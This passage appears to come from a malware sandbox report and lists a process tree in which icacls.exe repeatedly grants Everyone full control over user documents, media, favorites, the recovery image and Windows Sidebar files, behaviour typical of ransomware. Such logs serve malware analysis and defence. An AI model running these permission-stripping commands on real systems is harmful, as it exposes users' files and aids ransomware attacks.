  "icacls.exe" C:\Users\Admin\Music\SelectUse.mpeg2 /grant Everyone:F /T /C /Q
  2⤵
  PID:3368
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ShowUnlock.m3u /grant Everyone:F /T /C /Q
  2⤵
  PID:5624
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\StartConvert.asp /grant Everyone:F /T /C /Q
  2⤵
  PID:2356
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\StepResume.potx /grant Everyone:F /T /C /Q
  2⤵
  PID:5820
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\StopUninstall.vbs /grant Everyone:F /T /C /Q
  2⤵
  PID:6032
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\SwitchInvoke.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:5228
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\WaitDebug.mpg /grant Everyone:F /T /C /Q
  2⤵
  PID:5432
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\SwitchLimit.asp /grant Everyone:F /T /C /Q
  2⤵
  PID:6812
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\WaitPush.odt /grant Everyone:F /T /C /Q
  2⤵
  PID:7024
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\WatchClear.vst /grant Everyone:F /T /C /Q
  2⤵
  PID:3364
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Get Windows Live.url /grant Everyone:F /T /C /Q
  2⤵
  PID:4516
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Gallery.url /grant Everyone:F /T /C /Q
  2⤵
  PID:4168
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Mail.url /grant Everyone:F /T /C /Q
  2⤵
  PID:4644
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Windows Live\Windows Live Spaces.url /grant Everyone:F /T /C /Q
  2⤵
  PID:4864
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Autos.url /grant Everyone:F /T /C /Q
  2⤵
  PID:6780
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Money.url /grant Everyone:F /T /C /Q
  2⤵
  PID:1608
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Sports.url /grant Everyone:F /T /C /Q
  2⤵
  PID:4264
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN.url /grant Everyone:F /T /C /Q
  2⤵
  PID:3132
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN.url /grant Everyone:F /T /C /Q
  2⤵
  PID:4488
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSN Entertainment.url /grant Everyone:F /T /C /Q
  2⤵
  PID:1824
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\MSN Websites\MSNBC News.url /grant Everyone:F /T /C /Q
  2⤵
  PID:4008
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\IE Add-on site.url /grant Everyone:F /T /C /Q
  2⤵
  PID:396
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url /grant Everyone:F /T /C /Q
  2⤵
  PID:5064
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\Microsoft At Home.url /grant Everyone:F /T /C /Q
  2⤵
  PID:4280
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\Microsoft At Work.url /grant Everyone:F /T /C /Q
  2⤵
  PID:5420
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Microsoft Websites\Microsoft Store.url /grant Everyone:F /T /C /Q
  2⤵
  PID:5416
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Links for United States\GobiernoUSA.gov.url /grant Everyone:F /T /C /Q
  2⤵
  PID:7120
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Links for United States\USA.gov.url /grant Everyone:F /T /C /Q
  2⤵
  PID:1516
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Links\Suggested Sites.url /grant Everyone:F /T /C /Q
  2⤵
  PID:6996
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Favorites\Links\Web Slice Gallery.url /grant Everyone:F /T /C /Q
  2⤵
  PID:4464
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\ClearTest.asp /grant Everyone:F /T /C /Q
  2⤵
  PID:5348
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\CloseRepair.m3u /grant Everyone:F /T /C /Q
  2⤵
  PID:2168
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\CompleteInstall.easmx /grant Everyone:F /T /C /Q
  2⤵
  PID:6928
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\CompleteSuspend.xlsb /grant Everyone:F /T /C /Q
  2⤵
  PID:7140
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\CompressStep.m3u /grant Everyone:F /T /C /Q
  2⤵
  PID:5148
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\ConvertToLock.pub /grant Everyone:F /T /C /Q
  2⤵
  PID:980
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\GroupProtect.mht /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5604
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\InitializeEdit.crw /grant Everyone:F /T /C /Q
  2⤵
  PID:4772
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\LimitOpen.mht /grant Everyone:F /T /C /Q
  2⤵
  PID:4912
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\LimitResume.au3 /grant Everyone:F /T /C /Q
  2⤵
  PID:6972
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\MergeApprove.TTS /grant Everyone:F /T /C /Q
  2⤵
  PID:4288
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\MergeInstall.zip /grant Everyone:F /T /C /Q
  2⤵
  PID:6832
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\MountEnable.odp /grant Everyone:F /T /C /Q
  2⤵
  PID:7076
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\MountPublish.001 /grant Everyone:F /T /C /Q
  2⤵
  PID:4268
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\ReadPing.au3 /grant Everyone:F /T /C /Q
  2⤵
  PID:4416
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\PushCompress.rmi /grant Everyone:F /T /C /Q
  2⤵
  PID:7088
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\ReceiveRestart.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:4336
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\RequestEdit.jfif /grant Everyone:F /T /C /Q
  2⤵
  PID:3168
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\ResolveSync.tif /grant Everyone:F /T /C /Q
  2⤵
  PID:1304
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\SaveStart.xlsm /grant Everyone:F /T /C /Q
  2⤵
  PID:7060
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\SplitGrant.mov /grant Everyone:F /T /C /Q
  2⤵
  PID:4320
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\TestMove.raw /grant Everyone:F /T /C /Q
  2⤵
  PID:1544
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\UninstallStep.odt /grant Everyone:F /T /C /Q
  2⤵
  PID:4972
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\UnprotectJoin.rtf /grant Everyone:F /T /C /Q
  2⤵
  PID:4840
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\UnprotectOpen.docx /grant Everyone:F /T /C /Q
  2⤵
  PID:7108
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\UnpublishNew.vsd /grant Everyone:F /T /C /Q
  2⤵
  PID:2228
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Downloads\WriteTrace.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4988
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\Are.docx /grant Everyone:F /T /C /Q
  2⤵
  PID:3964
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\CheckpointGroup.xlsx /grant Everyone:F /T /C /Q
  2⤵
  PID:2204
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\CompressDisconnect.potx /grant Everyone:F /T /C /Q
  2⤵
  PID:6584
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\CompressMove.vsx /grant Everyone:F /T /C /Q
  2⤵
  PID:2024
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\ConfirmSet.mht /grant Everyone:F /T /C /Q
  2⤵
  PID:5928
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\ConvertFromInvoke.dotm /grant Everyone:F /T /C /Q
  2⤵
  PID:1160
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\ConvertSuspend.wps /grant Everyone:F /T /C /Q
  2⤵
  PID:1580
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\DebugMount.vssx /grant Everyone:F /T /C /Q
  2⤵
  PID:1532
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\DebugWatch.xlsm /grant Everyone:F /T /C /Q
  2⤵
  PID:844
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\DenyRemove.xltx /grant Everyone:F /T /C /Q
  2⤵
  PID:3944
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\EnableUnblock.pptm /grant Everyone:F /T /C /Q
  2⤵
  PID:7152
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\ExpandRead.pps /grant Everyone:F /T /C /Q
  2⤵
  PID:3544
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\Files.docx /grant Everyone:F /T /C /Q
  2⤵
  PID:1756
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\FindRepair.vssm /grant Everyone:F /T /C /Q
  2⤵
  PID:6708
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\HideDebug.vsx /grant Everyone:F /T /C /Q
  2⤵
  PID:6344
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\InstallClear.htm /grant Everyone:F /T /C /Q
  2⤵
  PID:3764
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\LimitSave.pot /grant Everyone:F /T /C /Q
  2⤵
  PID:6664
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\MeasureInitialize.csv /grant Everyone:F /T /C /Q
  2⤵
  PID:1180
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\MoveOut.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6304
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\Opened.docx /grant Everyone:F /T /C /Q
  2⤵
  PID:4156
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\OutDisconnect.dot /grant Everyone:F /T /C /Q
  2⤵
  PID:6784
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\PopAdd.xlt /grant Everyone:F /T /C /Q
  2⤵
  PID:5068
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\ResetSet.vssx /grant Everyone:F /T /C /Q
  2⤵
  PID:4236
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\Recently.docx /grant Everyone:F /T /C /Q
  2⤵
  PID:4244
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\ResumeClear.xlsm /grant Everyone:F /T /C /Q
  2⤵
  PID:2444
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\RevokeApprove.vdx /grant Everyone:F /T /C /Q
  2⤵
  PID:7156
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\SearchExit.ppsx /grant Everyone:F /T /C /Q
  2⤵
  PID:2280
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\SearchFind.ppt /grant Everyone:F /T /C /Q
  2⤵
  PID:3500
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\SearchSuspend.dotx /grant Everyone:F /T /C /Q
  2⤵
  PID:2676
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\StartClear.vssm /grant Everyone:F /T /C /Q
  2⤵
  PID:1728
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\StartMeasure.vdw /grant Everyone:F /T /C /Q
  2⤵
  PID:3952
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\StopResume.docx /grant Everyone:F /T /C /Q
  2⤵
  PID:5052
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\SwitchConvertTo.htm /grant Everyone:F /T /C /Q
  2⤵
  PID:2164
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\SyncGrant.pdf /grant Everyone:F /T /C /Q
  2⤵
  PID:4936
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\These.docx /grant Everyone:F /T /C /Q
  2⤵
  PID:3056
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\UninstallExit.vsdm /grant Everyone:F /T /C /Q
  2⤵
  PID:3972
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\UnlockConfirm.vssx /grant Everyone:F /T /C /Q
  2⤵
  PID:4180
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\UnprotectConvertTo.ppsx /grant Everyone:F /T /C /Q
  2⤵
  PID:6952
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\UnpublishLock.vdx /grant Everyone:F /T /C /Q
  2⤵
  PID:4992
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\UpdateConvertTo.vsdx /grant Everyone:F /T /C /Q
  2⤵
  PID:604
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\UpdateInitialize.vsd /grant Everyone:F /T /C /Q
  2⤵
  PID:5024
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\UpdateWatch.vsw /grant Everyone:F /T /C /Q
  2⤵
  PID:5008
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\WaitSuspend.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:2812
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Documents\WriteGet.vsd /grant Everyone:F /T /C /Q
  2⤵
  PID:2808
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ConfirmOpen.jfif /grant Everyone:F /T /C /Q
  2⤵
  PID:5940
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ConvertToGroup.wvx /grant Everyone:F /T /C /Q
  2⤵
  PID:2572
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\DisableConnect.clr /grant Everyone:F /T /C /Q
  2⤵
  PID:5812
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\DisableSend.aiff /grant Everyone:F /T /C /Q
  2⤵
  PID:7436
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\DisableEdit.ppsm /grant Everyone:F /T /C /Q
  2⤵
  PID:5136
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ExpandClose.ods /grant Everyone:F /T /C /Q
  2⤵
  PID:3984
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ExpandInitialize.ogg /grant Everyone:F /T /C /Q
  2⤵
  PID:7384
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ExpandRestore.ttc /grant Everyone:F /T /C /Q
  2⤵
  PID:2540
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\LockJoin.m1v /grant Everyone:F /T /C /Q
  2⤵
  PID:4140
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\MoveImport.inf /grant Everyone:F /T /C /Q
  2⤵
  PID:2240
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\NewLimit.xla /grant Everyone:F /T /C /Q
  2⤵
  PID:7536
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\ResetCopy.doc /grant Everyone:F /T /C /Q
  2⤵
  PID:5192
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\RestartGrant.mpeg /grant Everyone:F /T /C /Q
  2⤵
  PID:7460
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\RestartUndo.xlsx /grant Everyone:F /T /C /Q
  2⤵
  PID:1812
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Desktop\SaveGroup.mpeg3 /grant Everyone:F /T /C /Q
  2⤵
  PID:5320
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Contacts\Admin.contact /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:7544
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Recovery\6e3e77a2-1a56-11ec-8d0f-c222d480bba6\Winre.wim /grant Everyone:F /T /C /Q
  2⤵
  PID:7508
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\ja-JP\sbdrop.dll.mui /grant Everyone:F /T /C /Q
  2⤵
  PID:7596
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\ja-JP\Sidebar.exe.mui /grant Everyone:F /T /C /Q
  2⤵
  PID:2556
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\drag.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2576
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\icon.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5296
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\logo.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3328
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\gadget.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7632
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\settings.html /grant Everyone:F /T /C /Q
  2⤵
  PID:3220
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\weather.html /grant Everyone:F /T /C /Q
  2⤵
  PID:5520
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\highDpiImageSwap.js /grant Everyone:F /T /C /Q
  2⤵
  PID:7600
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\library.js /grant Everyone:F /T /C /Q
  2⤵
  PID:3316
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\localizedStrings.js /grant Everyone:F /T /C /Q
  2⤵
  PID:7696
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\settings.js /grant Everyone:F /T /C /Q
  2⤵
  PID:7768
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\weather.js /grant Everyone:F /T /C /Q
  2⤵
  PID:7752
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\css\localizedSettings.css /grant Everyone:F /T /C /Q
  2⤵
  PID:7728
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\css\settings.css /grant Everyone:F /T /C /Q
  2⤵
  PID:3352
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\css\weather.css /grant Everyone:F /T /C /Q
  2⤵
  PID:7724
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\1.png /grant Everyone:F /T /C /Q
  2⤵
  PID:7864
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\10.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5504
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\11.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3196
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\12.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3084
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\13.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3152
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\14.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3264
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\15.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2664
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\16.png /grant Everyone:F /T /C /Q
  2⤵
  PID:7812
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\17.png /grant Everyone:F /T /C /Q
  2⤵
  PID:7880
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\18.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5736
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\19.png /grant Everyone:F /T /C /Q
  2⤵
  PID:7820
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\1px.gif /grant Everyone:F /T /C /Q
  2⤵
  PID:7960
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\2.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3424
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\20.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3248
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\21.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3440
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\22.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5752
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\23.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5644
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\24.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3376
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\25.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3928
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\26.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3344
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\27.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3100
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\28.png /grant Everyone:F /T /C /Q
  2⤵
  PID:8060
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\3.png /grant Everyone:F /T /C /Q
  2⤵
  PID:8008
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\29.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5808
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\30.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5768
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\31.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3884
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\32.png /grant Everyone:F /T /C /Q
  2⤵
  PID:8052
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\33.png /grant Everyone:F /T /C /Q
  2⤵
  PID:7976
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\36.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6348
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\35.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3880
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\34.png /grant Everyone:F /T /C /Q
  2⤵
  PID:7972
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\37.png /grant Everyone:F /T /C /Q
  2⤵
  PID:7968
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\38.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3804
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\39.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3784
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\4.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3708
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\40.png /grant Everyone:F /T /C /Q
  2⤵
  PID:8172
- C:\Windows\system32\icacls.exe
